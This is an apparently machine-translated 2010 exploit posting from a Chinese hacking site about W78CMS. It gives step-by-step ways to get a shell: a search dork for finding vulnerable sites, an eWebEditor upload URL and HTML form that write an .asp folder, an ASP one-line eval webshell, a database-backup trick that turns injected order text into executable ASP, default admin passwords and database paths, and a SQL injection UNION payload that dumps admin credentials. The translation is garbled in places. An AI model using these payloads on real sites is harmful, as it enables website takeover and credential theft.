W78cms website management system 0day-vulnerability warning-the black bar safety net

2010-12-15T00:00:00
ID MYHACK58:62201028575
Type myhack58
Reporter 佚名
Modified 2010-12-15T00:00:00

Description

The vulnerability is simple, appear in the editor above, the prawns should all know:

Keywords: inurl:ShopMore. asp? id Visit this address http://hackqing.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Hack. the asp Visit this address can build a Hack. ASP folder...... Then use this html code to upload.

<form action="http://hackqing.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Hack. asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 0 0><br><br> <input type=submit value=upload> </form>

After uploading to view the source file, find the small back door address

To 6. X also works for ASP. aspx. JSP. Are work.

Attachment: W78CMS vulnerability to get a shell(Xday)

Use method two Major premise conditions: the site directory writable, and not delete the file backup function Method one: Prerequisites: each other not to modify the database the default address The first step: the order page, directly in the Product name, order number, etc. of the input word Trojan <%eval request("ha")%> Second step: backup the database. The database named asp file here NOTE: The first backup, the program will automatically add the. MDB suffix, the need to backup twice note: will pop up to your landing on the box, not the tube, and then execute the following backup The third step: the word Trojan connection, upload shell

Method two: Prerequisites: each other not to modify EWEB's default path The first step: directly at the EWEB Upload a picture of the suffix of the Trojans. Second step: backup the database. The database named asp file here NOTE: The first backup, the program will automatically add the. MDB suffix, the need to backup twice note: will pop up to your landing on the box, not the tube, and then execute the following backup Third step: after the backup is your shell.

Principles BACKUP DATABASE program File Validation filter errors, cause the program in the verification before performing a backup of the database. While the ordering information is written directly to the database.

This system the online edit the login page for the admin/eWebEditor/admin/login. asp Default user:admin password:1 9 8 6 2 5 Not into the can also try

The background and the default password is 8 6 7 7 9 5 3 3 abc123 the two

Try database the default address for/data/#sze7xiaohu. mdb

%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,1 0 The from admin a where '%'=' directly lost the search bar.